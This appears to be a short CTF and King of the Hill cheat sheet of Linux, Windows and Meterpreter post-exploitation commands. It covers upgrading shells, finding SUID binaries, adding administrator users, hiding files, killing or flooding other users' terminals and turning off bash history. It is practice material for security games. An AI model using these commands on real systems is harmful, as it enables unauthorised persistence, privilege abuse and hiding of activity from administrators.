2.2 KiB
Linux
Stablilize Shell
- ctrl+z
- stty raw -echo
- fg (press enter x2)
- export TERM=xterm , for using
clear
command
Spawn bash
- /usr/bin/script -qc /bin/bash 1&>/dev/null
- python -c 'import pty;pty.spawn("/bin/bash")'
- python3 -c 'import pty;pty.spawn("/bin/bash")'
Finding Binaries
- find . - perm /4000 (user id uid)
- find . -perm /2000 (group id guid)
Changing file attributes
chattr + i filename making file immutable
chattr -i filename making file mutable
lschattr filename Checking file attributes
Uploading Files
scp file/you/want user@ip
:/path/to/store
python -m SimpleHTTPServer [port] By default will listen on 8000
python3 -http.server [port] By default will listen on 8000
Windows
Adding User
net user "USER_NAME" "PASS" /add
Changing User's password
net user "USER_NAME" "NEWPASS"
Adding User to Administrators
net localgroup administrators "USER_NAME" /add
Changing File Permissions
CACLS files /e /p {USERNAME}:{PERMISSION}
Permissions:
1.R Read
2.W Write
3.C Change
4.F Full Control
Set File bits
attrib +r filename add read only bit
attrib -r filename remove read only bit
attrib +h filename add hidden bit
attrib -h filename remove hidden bit
Show hidden file/folder
dir /a show all hidden files & folder
dir /a:d show only hidden folder
dir /a:h show only hidden files
Meterpreter
Adding user for RDP
run getgui -u [USER_NAME] -p [PASS]
King Of The Hill (KoTH)
Monitoring and Closing Shell (Linux)
- strace
debugging / tamper with processes
- gbd
c/c++ debugger
- script - records terminal activites
- w /who
check current pts ,terminal device
- ps -t ps/pts
process monitoring
- script /dev/pts/0
montior terminal
- cat /dev/urandom > /dev/pts/pts-number 2>/dev/null
prints arbitary text on terminal
- pkill -9 -t pts/pts-number
Closing Session (Windows)
- quser
- logoff id|user_name
export HISTFILE=/dev/null found this it might help you out a little when doing KOTH it basically stops bash logging your commands in the ~/.bash_history file